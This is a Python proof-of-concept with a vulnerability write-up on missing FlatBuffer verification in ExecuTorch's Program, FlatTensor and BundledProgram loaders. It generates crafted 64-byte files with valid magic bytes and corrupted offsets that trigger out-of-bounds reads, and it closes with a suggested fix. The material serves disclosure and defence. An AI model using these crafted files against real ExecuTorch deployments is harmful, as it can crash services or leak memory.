| |
| """ |
| ExecuTorch Missing FlatBuffer Verification (CWE-20 -> CWE-125) |
| ================================================================ |
| |
| Target: ExecuTorch (pytorch/executorch) |
| Commit: 90e6e4ca4ef369ce4288ffcd2a0210d5137117dd |
| |
| Affected Files: |
| - FlatTensor: extension/flat_tensor/flat_tensor_data_map.cpp |
| Only checks 4-byte magic "FT01", no VerifyFlatTensorBuffer() call |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/extension/flat_tensor/flat_tensor_data_map.cpp |
| |
| - BundledProgram: devtools/bundled_program/bundled_program.cpp |
| Only checks magic, no VerifyBundledProgramBuffer() call |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/devtools/bundled_program/bundled_program.cpp |
| |
| - Program: runtime/executor/program.cpp + program.h:84 |
| Defaults to Verification::Minimal (magic-only check) |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/program.h#L84 |
| |
| CWE-20: Improper Input Validation |
| CWE-125: Out-of-bounds Read |
| |
| Description: |
| FlatBuffers provides a VerifyXxxBuffer() function that validates all internal |
| offsets and sizes within a serialized FlatBuffer before accessing them. Without |
| this verification, corrupted or maliciously crafted data can cause the |
| FlatBuffer accessors to return pointers to out-of-bounds memory. |
| |
| ExecuTorch accepts three types of serialized data: |
| 1. Program (.pte files) - defaults to Verification::Minimal (magic only) |
| 2. FlatTensor (.ptd files) - magic check only, NO verification API |
| 3. BundledProgram - magic check only, NO verification API |
| |
| In all three cases, the verification is insufficient. A valid 4-byte magic |
| header followed by corrupted FlatBuffer data will pass all checks but |
| cause OOB reads when the data is subsequently accessed. |
| |
| Impact: |
| Any malicious .pte, .ptd, or bundled program file with a valid magic header |
| but corrupted internal offsets can cause out-of-bounds memory reads, crashes, |
| or potentially code execution through controlled memory corruption. |
| """ |
|
|
| import struct |
| import sys |
| import os |
| import tempfile |
|
|
|
|
| |
# NOTE(review): not referenced anywhere in the visible part of this file;
# presumably the width in bytes of the uint32 root-table offset that starts a
# FlatBuffer (the file identifier follows at offset 4) -- confirm or remove.
FLATBUFFER_HEADER_SIZE = 4

# 4-byte file identifiers, one per serialized format exercised by this PoC.
# They are written to / compared against bytes [4:8] of each buffer.
PROGRAM_MAGIC = b"ET12"
FLAT_TENSOR_MAGIC = b"FT01"
BUNDLED_MAGIC = b"BP01"
|
|
|
|
def create_valid_flatbuffer_skeleton(magic: bytes, total_size: int = 64) -> bytearray:
    """Build a FlatBuffer-shaped buffer with a valid magic but corrupt field offsets.

    Layout produced (all integers little-endian, unlisted bytes are zero):

        [0:4]    uint32  offset of the root table (always 8)
        [4:8]    bytes   file identifier, i.e. ``magic``
        [8:12]   int32   root table's signed offset to its vtable (-8, which
                         places the vtable at 8 - (-8) = 16)
        [16:18]  uint16  vtable size in bytes (12 = 4-byte header + 4 slots)
        [18:20]  uint16  inline table size in bytes (32)
        [20:28]  uint16  four field offsets: 0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC

    The root table and vtable both lie inside the buffer; only the field
    offsets are corrupt, resolving to positions far beyond the buffer end.

    Args:
        magic: The 4-byte file identifier to embed at offset 4.
        total_size: Total length of the returned buffer in bytes (at least 28).

    Returns:
        A ``bytearray`` of exactly ``total_size`` bytes.

    Raises:
        ValueError: If ``magic`` is not exactly 4 bytes long (the slice
            assignment would otherwise silently resize the buffer), or if
            ``total_size`` is too small to hold the 28-byte skeleton.
    """
    magic_size = 4
    min_size = 28  # last field-offset slot ends at byte 28

    if len(magic) != magic_size:
        raise ValueError(
            f"magic must be exactly {magic_size} bytes, got {len(magic)}")
    if total_size < min_size:
        raise ValueError(
            f"total_size must be at least {min_size} bytes, got {total_size}")

    buf = bytearray(total_size)

    # Root table offset, followed by the file identifier.
    struct.pack_into("<I", buf, 0, 8)
    buf[4:8] = magic

    # Root table starts with a signed offset back to its vtable:
    # vtable_pos = table_pos - soffset = 8 - (-8) = 16.
    struct.pack_into("<i", buf, 8, -8)

    # VTable header: its own size, then the inline size of the table.
    vtable_size = 12
    table_size = 32
    struct.pack_into("<HH", buf, 16, vtable_size, table_size)

    # Four field-offset slots, each pointing ~64 KiB past the table start.
    struct.pack_into("<4H", buf, 20, 0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC)

    return buf
|
|
|
|
def simulate_magic_only_check(data: bytes, expected_magic: bytes) -> dict:
    """Model a loader that validates nothing but the 4-byte file identifier.

    The identifier is read from bytes [4:8] of ``data`` and compared with
    ``expected_magic``; no other part of the buffer is inspected.

    Args:
        data: Raw serialized buffer.
        expected_magic: Identifier the buffer must carry at offset 4.

    Returns:
        ``{"passes": False, "reason": "Data too small"}`` when ``data`` is
        shorter than 8 bytes; otherwise a dict with ``passes`` (whether the
        identifier matched), ``actual_magic``, ``expected_magic`` and
        ``data_size``.
    """
    size = len(data)
    if size < 8:
        return {"passes": False, "reason": "Data too small"}

    # The identifier sits right after the 4-byte root-table offset.
    found = data[4:8]
    return dict(
        passes=(found == expected_magic),
        actual_magic=found,
        expected_magic=expected_magic,
        data_size=size,
    )
|
|
|
|
def simulate_full_verify(data: bytes) -> dict:
    """Simulate a structural bounds check of the root table of a FlatBuffer.

    This is a simplified stand-in for a real FlatBuffer verifier. It checks
    only the root table and its vtable:

      1. The root table offset lies inside the buffer and leaves room for
         the table's 4-byte vtable offset.
      2. The vtable position lies inside the buffer and leaves room for the
         4-byte vtable header.
      3. The vtable size is at least 4 and the vtable fits in the buffer.
      4. The inline table size declared by the vtable fits in the buffer.
      5. Every non-zero field offset resolves to a position inside the buffer.

    It does not follow fields into nested tables, strings or vectors.

    Args:
        data: Raw serialized buffer.

    Returns:
        ``{"passes": False, "reason": "Data too small"}`` when ``data`` is
        shorter than 8 bytes; otherwise ``{"passes": bool, "issues": [...]}``
        where ``issues`` lists one human-readable message per problem found.
    """
    size = len(data)
    if size < 8:
        return {"passes": False, "reason": "Data too small"}

    issues = []

    root_offset = struct.unpack_from("<I", data, 0)[0]
    if root_offset >= size:
        issues.append(f"Root table offset {root_offset} >= buffer size {size}")
    elif root_offset + 4 > size:
        # In bounds, but the table's leading vtable offset cannot be read.
        issues.append(
            f"Root table at {root_offset} is truncated: "
            f"{root_offset}+4 > {size}")
    else:
        # A table starts with a signed offset that is subtracted from the
        # table position to locate its vtable.
        vtable_soffset = struct.unpack_from("<i", data, root_offset)[0]
        vtable_pos = root_offset - vtable_soffset
        if vtable_pos < 0 or vtable_pos >= size:
            issues.append(
                f"VTable position {vtable_pos} out of bounds [0, {size})")
        elif vtable_pos + 4 > size:
            # In bounds, but the two uint16 header fields cannot be read.
            issues.append(
                f"VTable header at {vtable_pos} is truncated: "
                f"{vtable_pos}+4 > {size}")
        else:
            vtable_size, table_size = struct.unpack_from("<HH", data, vtable_pos)

            if vtable_size < 4:
                # The vtable must at least contain its own 4-byte header.
                issues.append(
                    f"VTable size {vtable_size} is smaller than its 4-byte header")
            if vtable_pos + vtable_size > size:
                issues.append(
                    f"VTable extends past buffer: {vtable_pos}+{vtable_size} > {size}")
            if root_offset + table_size > size:
                issues.append(
                    f"Table extends past buffer: {root_offset}+{table_size} > {size}")

            # Each slot after the header is a uint16 offset relative to the
            # table start; 0 means "field not present".
            num_fields = (vtable_size - 4) // 2
            for i in range(num_fields):
                field_off_pos = vtable_pos + 4 + i * 2
                if field_off_pos + 2 > size:
                    # Remaining slots lie past the buffer; that was already
                    # reported above as "VTable extends past buffer".
                    break
                field_offset = struct.unpack_from("<H", data, field_off_pos)[0]
                if field_offset == 0:
                    continue
                absolute_pos = root_offset + field_offset
                if absolute_pos >= size:
                    issues.append(
                        f"Field {i} offset {field_offset} -> absolute {absolute_pos} "
                        f">= buffer size {size}")

    return {
        "passes": len(issues) == 0,
        "issues": issues,
    }
|
|
|
|
def main():
    """Run the proof-of-concept walkthrough and print a report to stdout.

    Steps:
      1. For each format (Program, FlatTensor, BundledProgram) build a
         64-byte skeleton with a valid magic and corrupt field offsets,
         hex-dump it, and contrast the magic-only check with the simulated
         full verification.
      2. Write one such skeleton to ``malicious.pte`` inside a temporary
         directory, describe it, and remove the file and directory again.
      3. Print the code locations where verification is missing.
      4. Print the out-of-bounds addresses the corrupt offsets resolve to,
         using an illustrative buffer base address.
      5. Print the related null-dereference scenario.
      Finally print a summary and the suggested fix.

    Returns:
        Always 1; the ``__main__`` guard passes it to ``sys.exit``.
    """
    print("=" * 78)
    print("ExecuTorch Missing FlatBuffer Verification PoC")
    print("CWE-20 (Improper Input Validation) -> CWE-125 (OOB Read)")
    print("=" * 78)
    print()

    _print_section(
        "STEP 1: Create malicious buffers with valid magic but corrupted offsets")

    formats = [
        ("Program (.pte)", PROGRAM_MAGIC, "program.h:84 — Verification::Minimal"),
        ("FlatTensor (.ptd)", FLAT_TENSOR_MAGIC, "flat_tensor_data_map.cpp — magic only"),
        ("BundledProgram", BUNDLED_MAGIC, "bundled_program.cpp — magic only"),
    ]

    for name, magic, location in formats:
        print(f" [{name}]")
        print(f" Verification: {location}")
        print()

        malicious = create_valid_flatbuffer_skeleton(magic, total_size=64)

        # Hex dump, 16 bytes per row, with a printable-ASCII column.
        print(f" Buffer ({len(malicious)} bytes):")
        for i in range(0, len(malicious), 16):
            row = malicious[i:i + 16]
            hex_part = " ".join(f"{b:02X}" for b in row)
            ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
            print(f" {i:04X}: {hex_part:<48s} {ascii_part}")
        print()

        # What the loaders do today: compare the magic and nothing else.
        magic_result = simulate_magic_only_check(bytes(malicious), magic)
        print(f" Magic-only check: {'PASS' if magic_result['passes'] else 'FAIL'}")
        print(f" Expected: {magic_result['expected_magic']}")
        print(f" Actual: {magic_result['actual_magic']}")
        print()

        # What a structural verification would report for the same bytes.
        verify_result = simulate_full_verify(bytes(malicious))
        print(f" Full FlatBuffer verify: {'PASS' if verify_result['passes'] else 'FAIL'}")
        if verify_result.get("issues"):
            for issue in verify_result["issues"]:
                print(f" - {issue}")
        print()

        if magic_result["passes"] and not verify_result["passes"]:
            print(" >>> VULNERABILITY: Magic check PASSES but buffer is CORRUPTED <<<")
            print(" >>> Subsequent FlatBuffer field accesses will read OOB memory <<<")
            print()

    _print_section("STEP 2: Create concrete malicious .pte file")

    malicious_pte = create_valid_flatbuffer_skeleton(PROGRAM_MAGIC, total_size=64)

    # TemporaryDirectory removes the file and directory even if writing or
    # printing raises, which the manual unlink/rmdir sequence did not.
    with tempfile.TemporaryDirectory(prefix="executorch_poc_") as tmpdir:
        pte_path = os.path.join(tmpdir, "malicious.pte")
        with open(pte_path, "wb") as f:
            f.write(malicious_pte)

        print(f" Written malicious .pte to: {pte_path}")
        print(f" File size: {len(malicious_pte)} bytes")
        print()
        print(" This file has:")
        print(f" - Valid magic: {PROGRAM_MAGIC} at offset 4")
        print(f" - Root table offset: {struct.unpack_from('<I', malicious_pte, 0)[0]}")
        print(" - Corrupted field offsets: 0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC")
        print(" - These offsets resolve to absolute positions 65528-65540")
        print(" - Buffer is only 64 bytes, so all accesses are OOB")
        print()

    _print_section("STEP 3: Code Analysis — Where verification is missing")

    print(" 1. Program (runtime/executor/program.h:84):")
    print(" Default: Verification::Minimal")
    print()
    print(' static Result<Program> load(')
    print(' DataLoader* loader,')
    print(' Program::Verification verification =')
    print(' Program::Verification::Minimal); // <-- DEFAULT: magic only!')
    print()
    print(" Even when InternalConsistency is used, it only calls")
    print(" flatbuffers::Verifier which has known limitations with")
    print(" nested FlatBuffers and union types.")
    print()

    print(" 2. FlatTensor (extension/flat_tensor/flat_tensor_data_map.cpp):")
    print()
    print(' // Only checks magic — NO VerifyFlatTensorBuffer()')
    print(' const uint8_t* magic = data + FlatTensorHeader::kMagicOffset;')
    print(' if (memcmp(magic, FlatTensorHeader::kExpectedMagic,')
    print(' FlatTensorHeader::kMagicSize) != 0) {')
    print(' return Error::InvalidArgument;')
    print(' }')
    print(' // Immediately uses GetFlatTensor(data) without verification')
    print(' auto* flat_tensor = flatbuffers::GetRoot<FlatTensor>(data);')
    print()
    print(" Missing: flatbuffers::Verify(data, size) before GetRoot()")
    print()

    print(" 3. BundledProgram (devtools/bundled_program/bundled_program.cpp):")
    print()
    print(' // Only checks magic — NO VerifyBundledProgramBuffer()')
    print(' if (!IsBundledProgram(file_data)) { return Error; }')
    print(' // IsBundledProgram only checks the magic bytes')
    print(' auto* bundled_program = GetBundledProgram(file_data);')
    print()
    print(" Missing: VerifyBundledProgramBuffer() before GetBundledProgram()")
    print()

    _print_section("STEP 4: What happens when corrupted FlatBuffer is accessed")

    print(" After the magic check passes, ExecuTorch calls FlatBuffer accessors")
    print(" like program->execution_plan(), tensor->sizes(), etc.")
    print()
    print(" With corrupted offsets, these accessors compute pointers like:")
    print()

    # Illustrative addresses only: a made-up base for a 64-byte buffer whose
    # root table sits 8 bytes in, matching the skeleton built above.
    buf_base = 0x7F0000000000
    buf_size = 64
    buf_end = buf_base + buf_size
    root_table = buf_base + 8
    corrupted_field_offsets = [0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC]

    for i, field_off in enumerate(corrupted_field_offsets):
        absolute_addr = root_table + field_off
        oob_distance = absolute_addr - buf_end
        print(f" Field {i}: table_addr(0x{root_table:X}) + offset(0x{field_off:X}) = 0x{absolute_addr:X}")
        print(f" Buffer ends at 0x{buf_end:X}")
        print(f" OOB by {oob_distance} bytes")
        print(f" >>> Reads {4 + i * 4} bytes of unrelated heap memory <<<")
        print()

    _print_section("STEP 5: Null deref angle (FlatTensor optional fields)")

    print(" flat_tensor_data_map.cpp:93-97 accesses optional FlatBuffer fields")
    print(" without null checks:")
    print()
    print(' auto* sizes = tensor_metadata->sizes(); // Can be nullptr')
    print(' auto* dim_order = tensor_metadata->dim_order(); // Can be nullptr')
    print(' size_t num_dims = sizes->size(); // CRASH: null dereference')
    print()
    print(" A FlatBuffer with the sizes field offset set to 0 (not present)")
    print(" will cause sizes() to return nullptr, then ->size() crashes.")
    print()

    _print_section("SUMMARY", rule="=")

    print(" ExecuTorch uses only magic-byte verification for all three serialized")
    print(" data formats (Program, FlatTensor, BundledProgram). This means any")
    print(" 64-byte file with the correct 4-byte magic header will be accepted")
    print(" and parsed, even if internal FlatBuffer offsets are corrupted.")
    print()
    print(" The FlatBuffers library provides VerifyXxxBuffer() functions that")
    print(" validate all internal offsets before use. ExecuTorch either:")
    print(" - Defaults to Verification::Minimal (Program)")
    print(" - Has no verification API at all (FlatTensor, BundledProgram)")
    print()
    print(" Fix: Call the appropriate FlatBuffer Verify function for each format")
    print(" before accessing any fields. For Program, change the default to")
    print(" Verification::InternalConsistency. For FlatTensor and BundledProgram,")
    print(" add and use VerifyFlatTensorBuffer() / VerifyBundledProgramBuffer().")

    # NOTE(review): the script always exits with status 1; presumably that is
    # meant to signal "vulnerable" to a calling harness -- confirm.
    return 1


def _print_section(title, rule="-"):
    """Print ``title`` framed by two 78-character rules, then a blank line."""
    print(rule * 78)
    print(title)
    print(rule * 78)
    print()
|
|
|
|
# Script entry point: run the walkthrough only when executed directly, and
# use main()'s return value as the process exit status.
if __name__ == "__main__":
    sys.exit(main())
|
|